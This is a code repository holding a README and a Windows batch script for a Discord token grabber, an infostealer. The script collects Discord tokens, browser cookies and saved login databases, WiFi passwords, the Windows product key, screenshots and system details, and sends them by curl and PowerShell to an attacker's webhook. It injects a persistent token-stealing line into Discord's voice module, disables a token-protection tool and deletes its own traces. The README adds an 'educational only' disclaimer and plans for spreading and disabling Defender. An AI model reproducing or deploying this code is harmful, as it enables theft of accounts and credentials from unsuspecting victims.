├── README.md
└── fixed_token_grabber.bat

/README.md:
--------------------------------------------------------------------------------
1 | # took it down due to it was patched and also github doesn't like hosting malware even if it's for education
2 | # WHICH MEANS IT NO LONGER WORKS
3 |
4 | # fixed-token-grabber
5 | a fixed version of the batch token grabber which was fully undetected. it grabs the tokens of discord client and discord web and it sets the token grabber inside the discord voice folder in the index.js. it sends the token every time discord gets restarted. it's for the latest discord versions 0.0.309 and most versions after it, also the newest ones
6 |
7 |
8 | ## This is the Free version of my Grabber i will work at some other projects if you are interested join my discord
9 | ## [discord server](https://discord.gg/Nr2p7ECmt2)
10 |
11 | ### added
12 | - ip
13 | - installed programs
14 | - installed antiviruses #removed because it caused false detections
15 | - all system information
16 | - ipconfig
17 | - netstat
18 | - launcher_accounts.json
19 | - screenshot
20 | - username
21 | - time
22 | - date
23 | - os
24 | - computername
25 | - hwid
26 | - instant tokengrabber #fixed by discord
27 | - undetectable from any antivirus #got detected after some time because people reported it on virustotal
28 | - Discord Token Protector fucker https://github.com/andro2157/DiscordTokenProtector
29 | - Productkey
30 | - not decrypted Chrome passwords, Cookies, History, Shortcuts, Bookmarks
31 | - not decrypted Opera passwords, Cookies, History, Shortcuts, Bookmarks
32 | - not decrypted Brave passwords, Cookies, History, Shortcuts, Bookmarks
33 |
34 |
35 | ### todo
36 | - ip lookup api
37 | - wifi passwords
38 | - spreading
39 | - builder
40 | - camera pic
41 | - destroy defender
42 | - disable wifi
43 | - switch mouse buttons
44 | - block websites
45 | - startup
46 |
47 | ## i don't take any responsibility for damage done with the program it's for educational
purposes only it is just to prove that your antivirus isnt that good how you think and that even if files doesnt have any detections still can harm you dont use this to token grabb others 48 | -------------------------------------------------------------------------------- /fixed_token_grabber.bat: -------------------------------------------------------------------------------- 1 | 2 | 3 | @echo off 4 | :: i dont take any responsibility for damage done with the programm it's for educational purposes only 5 | ::replace the YOURWEBHOOK field with your webhook 6 | set webhook=YOURWEBHOOK 7 | 8 | 9 | 10 | 11 | :check_Permissions 12 | 13 | 14 | net session >nul 2>&1 15 | if %errorLevel% == 0 ( 16 | goto starti 17 | ) else ( 18 | cls 19 | echo Failure: Please run the file again with Admin 20 | timeout 2 >NUL 21 | goto check_Permissions 22 | ) 23 | 24 | 25 | :starti 26 | ::set 1 if you want that the discord of your target get closed ( discord needs to be restarted to send you the token) 27 | set /a killdc = 0 28 | 29 | ::get ip 30 | curl -o %userprofile%\AppData\Local\Temp\ipp.txt https://myexternalip.com/raw 31 | set /p ip=<%userprofile%\AppData\Local\Temp\ipp.txt 32 | 33 | ::gets a list of all installed programms 34 | powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >%userprofile%\AppData\Local\Temp\programms.txt " 35 | 36 | 37 | ::gets informations about the pc 38 | echo Hard Drive Space:>%userprofile%\AppData\Local\Temp\System_INFO.txt 39 | wmic diskdrive get size>>%userprofile%\AppData\Local\Temp\System_INFO.txt 40 | echo Service Tag:>>%userprofile%\AppData\Local\Temp\System_INFO.txt 41 | wmic bios get serialnumber>>%userprofile%\AppData\Local\Temp\System_INFO.txt 42 | echo CPU:>>%userprofile%\AppData\Local\Temp\System_INFO.txt 43 | wmic cpu get name>>%userprofile%\AppData\Local\Temp\System_INFO.txt 44 | 
systeminfo>%userprofile%\AppData\Local\Temp\sysi.txt 45 | wmic csproduct get uuid >%userprofile%\AppData\Local\Temp\uuid.txt 46 | for /F "tokens=2 delims=:" %%a in ('netsh wlan show profile') do ( 47 | netsh wlan show profile %%a key=clear >>%userprofile%\AppData\Local\Temp\wlan.txt 48 | 49 | ) 50 | 51 | :aftertesti 52 | 53 | ::gets the ipconfig (also local ip) 54 | ipconfig /all >%userprofile%\AppData\Local\Temp\ip.txt 55 | 56 | ::gets the info about the netstat 57 | netstat -an >%userprofile%\AppData\Local\Temp\netstat.txt 58 | 59 | ::sends the launcher_accounts.json if minecraft exist 60 | if exist %userprofile%\AppData\Roaming\.minecraft\launcher_accounts.json curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Roaming\.minecraft\launcher_accounts.json %web% && goto end 61 | 62 | ::makes and sends a screenshot 63 | echo $SERDO = Get-Clipboard >%userprofile%\AppData\Local\Temp\test.ps1 64 | echo function Get-ScreenCapture >>%userprofile%\AppData\Local\Temp\test.ps1 65 | echo { >>%userprofile%\AppData\Local\Temp\test.ps1 66 | echo begin { >>%userprofile%\AppData\Local\Temp\test.ps1 67 | echo Add-Type -AssemblyName System.Drawing, System.Windows.Forms >>%userprofile%\AppData\Local\Temp\test.ps1 68 | echo Add-Type -AssemblyName System.Drawing >>%userprofile%\AppData\Local\Temp\test.ps1 69 | echo $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() ^| >>%userprofile%\AppData\Local\Temp\test.ps1 70 | echo Where-Object { $_.FormatDescription -eq "JPEG" } >>%userprofile%\AppData\Local\Temp\test.ps1 71 | echo } >>%userprofile%\AppData\Local\Temp\test.ps1 72 | echo process { >>%userprofile%\AppData\Local\Temp\test.ps1 73 | echo Start-Sleep -Milliseconds 44 >>%userprofile%\AppData\Local\Temp\test.ps1 74 | echo [Windows.Forms.Sendkeys]::SendWait("{PrtSc}") >>%userprofile%\AppData\Local\Temp\test.ps1 75 | echo Start-Sleep -Milliseconds 550 >>%userprofile%\AppData\Local\Temp\test.ps1 76 | echo $bitmap = [Windows.Forms.Clipboard]::GetImage() 
>>%userprofile%\AppData\Local\Temp\test.ps1 77 | echo $ep = New-Object Drawing.Imaging.EncoderParameters >>%userprofile%\AppData\Local\Temp\test.ps1 78 | echo $ep.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, [long]100) >>%userprofile%\AppData\Local\Temp\test.ps1 79 | echo $screenCapturePathBase = $env:temp + "\" + $env:UserName + "_Capture" >>%userprofile%\AppData\Local\Temp\test.ps1 80 | echo $bitmap.Save("${screenCapturePathBase}.jpg", $jpegCodec, $ep) >>%userprofile%\AppData\Local\Temp\test.ps1 81 | echo } >>%userprofile%\AppData\Local\Temp\test.ps1 82 | echo } >>%userprofile%\AppData\Local\Temp\test.ps1 83 | echo Get-ScreenCapture >>%userprofile%\AppData\Local\Temp\test.ps1 84 | echo Set-Clipboard -Value $SERDO >>%userprofile%\AppData\Local\Temp\test.ps1 85 | echo $result = "%webhook%" >>%userprofile%\AppData\Local\Temp\test.ps1 86 | echo $screenCapturePathBase = $env:temp + "\" + $env:UserName + "_Capture.jpg" >>%userprofile%\AppData\Local\Temp\test.ps1 87 | echo curl.exe -i -F file=@"$screenCapturePathBase" $result >>%userprofile%\AppData\Local\Temp\test.ps1 88 | timeout 1 >NUL 89 | Powershell.exe -executionpolicy remotesigned -File %userprofile%\AppData\Local\Temp\test.ps1 && del %userprofile%\AppData\Local\Temp\test.ps1 90 | 91 | ::sends the username, ip, current time, and date of the victim 92 | 93 | 94 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"```User = %username% Ip = %ip% time = %time% date = %date% os = %os% Computername = %computername% ```\"}" %webhook% 95 | 96 | ::sends all files 97 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\System_INFO.txt %webhook% 98 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\sysi.txt %webhook% 99 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\ip.txt %webhook% 100 | curl -i -H 'Expect: application/json' -F 
file=@%userprofile%\AppData\Local\Temp\netstat.txt %webhook% 101 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\programms.txt %webhook% 102 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\uuid.txt %webhook% 103 | curl -i -H 'Expect: application/json' -F file=@%userprofile%\AppData\Local\Temp\wlan.txt %webhook% 104 | 105 | 106 | ::grabbs the token 107 | 108 | echo $hook = "%webhook%" >%userprofile%\AppData\Local\Temp\testtttt.ps1 109 | echo $token = new-object System.Collections.Specialized.StringCollection >>%userprofile%\AppData\Local\Temp\testtttt.ps1 110 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 111 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 112 | echo $db_path = @( >>%userprofile%\AppData\Local\Temp\testtttt.ps1 113 | echo $env:APPDATA + "\Discord\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 114 | echo $env:APPDATA + "\Roaming\Discord\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 115 | echo $env:APPDATA + "\Roaming\Lightcord\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 116 | echo $env:APPDATA + "\Roaming\discordptb\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 117 | echo $env:APPDATA + "\Roaming\discordcanary\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 118 | echo $env:APPDATA + "\Roaming\Opera Software\Opera Stable\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 119 | echo $env:APPDATA + "\Roaming\Opera Software\Opera GX Stable\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 120 | echo. 
>>%userprofile%\AppData\Local\Temp\testtttt.ps1 121 | echo $env:APPDATA + "\Local\Amigo\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 122 | echo $env:APPDATA + "\Local\Torch\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 123 | echo $env:APPDATA + "\Local\Kometa\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 124 | echo $env:APPDATA + "\Local\Orbitum\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 125 | echo $env:APPDATA + "\Local\CentBrowser\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 126 | echo $env:APPDATA + "\Local\7Star\7Star\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 127 | echo $env:APPDATA + "\Local\Sputnik\Sputnik\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 128 | echo $env:APPDATA + "\Local\Vivaldi\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 129 | echo $env:APPDATA + "\Local\Google\Chrome SxS\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 130 | echo $env:APPDATA + "\Local\Epic Privacy Browser\User Data\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 131 | echo $env:APPDATA + "\Local\Google\Chrome\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 132 | echo $env:APPDATA + "\Local\uCozMedia\Uran\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 133 | echo $env:APPDATA + "\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 134 | echo $env:APPDATA + "\Local\Yandex\YandexBrowser\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 135 | echo $env:APPDATA + "\Local\Opera Software\Opera Neon\User Data\Default\Local Storage\leveldb" 
>>%userprofile%\AppData\Local\Temp\testtttt.ps1 136 | echo $env:APPDATA + "\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Storage\leveldb" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 137 | echo ) >>%userprofile%\AppData\Local\Temp\testtttt.ps1 138 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 139 | echo foreach ($path in $db_path) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 140 | echo if (Test-Path $path) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 141 | echo foreach ($file in Get-ChildItem -Path $path -Name) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 142 | echo $data = Get-Content -Path "$($path)\$($file)" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 143 | echo $regex = [regex] "[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}" >>%userprofile%\AppData\Local\Temp\testtttt.ps1 144 | echo $match = $regex.Match($data) >>%userprofile%\AppData\Local\Temp\testtttt.ps1 145 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 146 | echo while ($match.Success) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 147 | echo if (!$token.Contains($match.Value)) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 148 | echo $token.Add($match.Value) ^| out-null >>%userprofile%\AppData\Local\Temp\testtttt.ps1 149 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 150 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 151 | echo $match = $match.NextMatch() >>%userprofile%\AppData\Local\Temp\testtttt.ps1 152 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 153 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 154 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 155 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 156 | echo. 
>>%userprofile%\AppData\Local\Temp\testtttt.ps1 157 | echo $content = ">>> ||@everyone|| **New Token** ``` " >>%userprofile%\AppData\Local\Temp\testtttt.ps1 158 | echo foreach ($data in $token) { >>%userprofile%\AppData\Local\Temp\testtttt.ps1 159 | echo $content = [string]::Concat($content, "`n", $data) >>%userprofile%\AppData\Local\Temp\testtttt.ps1 160 | echo } >>%userprofile%\AppData\Local\Temp\testtttt.ps1 161 | echo $content = [string]::Concat($content, "``` ") >>%userprofile%\AppData\Local\Temp\testtttt.ps1 162 | echo. >>%userprofile%\AppData\Local\Temp\testtttt.ps1 163 | echo $JSON = @{ "content"= $content;}^| convertto-json >>%userprofile%\AppData\Local\Temp\testtttt.ps1 164 | echo Invoke-WebRequest -uri $hook -Method POST -Body $JSON -Headers @{"Content-Type" = "application/json"} >>%userprofile%\AppData\Local\Temp\testtttt.ps1 165 | Powershell.exe -executionpolicy remotesigned -File %userprofile%\AppData\Local\Temp\testtttt.ps1 166 | 167 | set /a app = 0 168 | set /a voice = 0 169 | if exist %userprofile%\AppData\Roaming\discord\0.0.309\modules\discord_voice\index.js echo var X = window.localStorage = document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage;var V = JSON.stringify(X);var L = V;var C = JSON.parse(L);var strtoken = C["token"];var O = new XMLHttpRequest();O.open('POST', '%webhook%', false);O.setRequestHeader('Content-Type', 'application/json');O.send('{"content": ' + strtoken + '}'); >>%userprofile%\AppData\Roaming\discord\0.0.309\modules\discord_voice\index.js 170 | :a 171 | if exist %userprofile%\AppData\Local\Discord\app-1.0.900%app%\modules\discord_voice-%voice%\discord_voice\index.js goto b 172 | set /a app=%app%+1 173 | if %app% == 10 goto c 174 | goto a 175 | :c 176 | set /a app=0 177 | set /a voice=%voice%+1 178 | if %voice% == 99 goto e 179 | goto a 180 | :b 181 | echo var X = window.localStorage = document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage;var V = 
JSON.stringify(X);var L = V;var C = JSON.parse(L);var strtoken = C["token"];var O = new XMLHttpRequest();O.open('POST', '%webhook%', false);O.setRequestHeader('Content-Type', 'application/json');O.send('{"content": ' + strtoken + '}'); >>%userprofile%\AppData\Local\Discord\app-1.0.900%app%\modules\discord_voice-%voice%\discord_voice\index.js 182 | if %killdc% == 1 goto d 183 | goto e 184 | :d 185 | ::coded by baum#2873 186 | 187 | ::DiscordTokenProtector Fucker 188 | taskkill /im Discord.exe /f 189 | taskkill /im DiscordTokenProtector.exe /f 190 | del %userprofile%\AppData\Roaming\DiscordTokenProtector\DiscordTokenProtector.exe 191 | del %userprofile%\AppData\Roaming\DiscordTokenProtector\ProtectionPayload.dll 192 | del %userprofile%\AppData\Roaming\DiscordTokenProtector\secure.dat 193 | echo { >%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 194 | echo "auto_start": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 195 | echo "auto_start_discord": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 196 | echo "integrity": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 197 | echo "integrity_allowbetterdiscord": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 198 | echo "integrity_checkexecutable": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 199 | echo "integrity_checkhash": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 200 | echo "integrity_checkmodule": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 201 | echo "integrity_checkresource": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 202 | echo "integrity_checkscripts": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 203 | echo "integrity_redownloadhashes": false, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 204 | echo "iterations_iv": 187, 
>>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 205 | echo "iterations_key": -666, >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 206 | echo "version": 69 >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 207 | echo } >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 208 | echo anti DiscordTokenProtector by https://github.com/baum1810 >>%userprofile%\AppData\Roaming\DiscordTokenProtector\config.json 209 | 210 | 211 | 212 | ::get product key 213 | echo Set WshShell = CreateObject("WScript.Shell") >%userprofile%\AppData\Local\Temp\key.vbs 214 | echo Set FSO = CreateObject("Scripting.FileSystemObject") >>%userprofile%\AppData\Local\Temp\key.vbs 215 | echo Set File = FSO.CreateTextFile("%userprofile%\AppData\Local\Temp\Productkey.txt",True) >>%userprofile%\AppData\Local\Temp\key.vbs 216 | echo File.Write ConvertToKey(WshShell.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId")) >>%userprofile%\AppData\Local\Temp\key.vbs 217 | echo File.Close >>%userprofile%\AppData\Local\Temp\key.vbs 218 | echo Function ConvertToKey(Key) >>%userprofile%\AppData\Local\Temp\key.vbs 219 | echo Const KeyOffset = 52 >>%userprofile%\AppData\Local\Temp\key.vbs 220 | echo i = 28 >>%userprofile%\AppData\Local\Temp\key.vbs 221 | echo Chars = "BCDFGHJKMPQRTVWXY2346789" >>%userprofile%\AppData\Local\Temp\key.vbs 222 | echo Do >>%userprofile%\AppData\Local\Temp\key.vbs 223 | echo Cur = 0 >>%userprofile%\AppData\Local\Temp\key.vbs 224 | echo x = 14 >>%userprofile%\AppData\Local\Temp\key.vbs 225 | echo Do >>%userprofile%\AppData\Local\Temp\key.vbs 226 | echo Cur = Cur * 256 >>%userprofile%\AppData\Local\Temp\key.vbs 227 | echo Cur = Key(x + KeyOffset) + Cur >>%userprofile%\AppData\Local\Temp\key.vbs 228 | echo Key(x + KeyOffset) = (Cur \ 24) And 255 >>%userprofile%\AppData\Local\Temp\key.vbs 229 | echo Cur = Cur Mod 24 >>%userprofile%\AppData\Local\Temp\key.vbs 230 | echo x = x -1 
>>%userprofile%\AppData\Local\Temp\key.vbs 231 | echo Loop While x ^>= 0 >>%userprofile%\AppData\Local\Temp\key.vbs 232 | echo i = i -1 >>%userprofile%\AppData\Local\Temp\key.vbs 233 | echo KeyOutput = Mid(Chars, Cur + 1, 1) ^& KeyOutput >>%userprofile%\AppData\Local\Temp\key.vbs 234 | echo If (((29 - i) Mod 6) = 0) And (i ^<^> -1) Then >>%userprofile%\AppData\Local\Temp\key.vbs 235 | echo i = i -1 >>%userprofile%\AppData\Local\Temp\key.vbs 236 | echo KeyOutput = "-" ^& KeyOutput >>%userprofile%\AppData\Local\Temp\key.vbs 237 | echo End If >>%userprofile%\AppData\Local\Temp\key.vbs 238 | echo Loop While i ^>= 0 >>%userprofile%\AppData\Local\Temp\key.vbs 239 | echo ConvertToKey = KeyOutput >>%userprofile%\AppData\Local\Temp\key.vbs 240 | echo End Function >>%userprofile%\AppData\Local\Temp\key.vbs 241 | start %userprofile%\AppData\Local\Temp\key.vbs 242 | timeout 1 >NUL 243 | 244 | set /p keya=<%localappdata%\Temp\Productkey.txt 245 | 246 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"Productkey: %keya%\"}" %webhook% 247 | 248 | 249 | ::not decrypted passwords 250 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"Chrome data \"}" %webhook% 251 | curl -F c=@"%localappdata%\Google\Chrome\User Data\Default\Cookies" %webhook% 252 | curl -F h=@"%localappdata%\Google\Chrome\User Data\Default\History" %webhook% 253 | curl -F s=@"%localappdata%\Google\Chrome\User Data\Default\Shortcuts" %webhook% 254 | curl -F b=@"%localappdata%\Google\Chrome\User Data\Default\Bookmarks" %webhook% 255 | curl -F l=@"%localappdata%\Google\Chrome\User Data\Default\Login Data" %webhook% 256 | curl -F l=@"%localappdata%\Google\Chrome\User Data\Local State" %webhook% 257 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"Opera data: \"}" %webhook% 258 | curl -F c=@"%appdata%\Opera Software\Opera Stable\Cookies" %webhook% 259 | curl -F h=@"%appdata%\Opera Software\Opera Stable\History" %webhook% 260 | curl -F 
s=@"%appdata%\Opera Software\Opera Stable\Shortcuts" %webhook% 261 | curl -F b=@"%appdata%\Opera Software\Opera Stable\Bookmarks" %webhook% 262 | curl -F l=@"%appdata%\Opera Software\Opera Stable\Login Data" %webhook% 263 | curl -X POST -H "Content-type: application/json" --data "{\"content\": \"Brave data: \"}" %webhook% 264 | curl -F ff=@"%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\Bookmarks" %webhook% 265 | curl -F hf=@"%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\History" %webhook% 266 | curl -F df=@"%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\Login Data" %webhook% 267 | curl -F daf=@"%localappdata%\BraveSoftware\Brave-Browser\User Data\Default\Shortcuts" %webhook% 268 | 269 | 270 | ::deletes all temp files 271 | del %localappdata%\Temp\ip.txt 272 | del %localappdata%\Temp\ipp.txt 273 | del %localappdata%\Temp\sysi.txt 274 | del %localappdata%\Temp\System_INFO.txt 275 | del %localappdata%\Temp\netstat.txt 276 | del %localappdata%\Temp\test.ps1 277 | del %localappdata%\Temp\programms.txt 278 | del %localappdata%\Temp\%username%_Capture.jpg 279 | del %localappdata%\Temp\uuid.txt 280 | del %localappdata%\Temp\testtttt.ps1 281 | del %localappdata%\Temp\wlan.txt 282 | del %localappdata%\Temp\key.vbs 283 | del %localappdata%\Temp\Productkey.txt 284 | --------------------------------------------------------------------------------
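The README and script above describe persistence by appending a line to the Discord client's `discord_voice\index.js` that reads `localStorage` and POSTs to a webhook. The following is an added defensive example, not part of the repository: a heuristic integrity check that walks a Discord install tree and flags module `index.js` files carrying those traits. The indicator names, the scoring rule and the demo tree (including the stand-in for a clean `index.js`) are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Indicators modelled on the line this page appends to discord_voice\index.js.
INDICATORS = {
    "webhook_url": re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/", re.I),
    "local_storage": re.compile(r"\blocalStorage\b"),
    "token_read": re.compile(r"""\[\s*["']token["']\s*\]|getItem\(\s*["']token["']"""),
    "http_post": re.compile(r"XMLHttpRequest|\.open\(\s*['\"]POST['\"]", re.I),
    "iframe_trick": re.compile(r"createElement\s*\(?\s*[`'\"]iframe[`'\"]"),
}


def scan_file(path):
    """Return the sorted names of all indicators present in one file."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_suspicious(hits):
    """Assumed rule: a webhook URL alone is enough, otherwise three co-occurring traits."""
    return "webhook_url" in hits or len(hits) >= 3


def scan_discord_modules(root):
    """Check every index.js below a 'modules' directory; return {relative path: hits}."""
    root = Path(root)
    findings = {}
    for js in root.rglob("index.js"):
        if "modules" not in js.relative_to(root).parts:
            continue
        hits = scan_file(js)
        if is_suspicious(hits):
            findings[js.relative_to(root).as_posix()] = hits
    return findings


def build_demo_tree(root):
    """Constructed sample data: one clean module and one with an implant-like tail."""
    base = Path(root) / "app-0.0.0" / "modules"
    clean = base / "discord_utils-1" / "discord_utils" / "index.js"
    tampered = base / "discord_voice-1" / "discord_voice" / "index.js"
    for p in (clean, tampered):
        p.parent.mkdir(parents=True, exist_ok=True)
    clean.write_text("module.exports = require('./discord_utils.node');\n")
    tampered.write_text(
        "module.exports = require('./discord_voice.node');\n"
        # Shortened, non-functional fragment with a placeholder URL.
        "var X = document.body.appendChild(document.createElement `iframe`)"
        ".contentWindow.localStorage;var O = new XMLHttpRequest();"
        "O.open('POST', 'https://discord.com/api/webhooks/0/CONSTRUCTED', false);\n"
    )
    return clean, tampered


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo_root:
        build_demo_tree(demo_root)
        for rel_path, hits in scan_discord_modules(demo_root).items():
            print(f"SUSPICIOUS {rel_path}: {', '.join(hits)}")
```

On a Windows host the roots to pass to `scan_discord_modules` are the two locations the script writes to, `%LOCALAPPDATA%\Discord` and `%APPDATA%\discord`; a hit is a prompt to reinstall the client and reset the account password, which invalidates existing tokens.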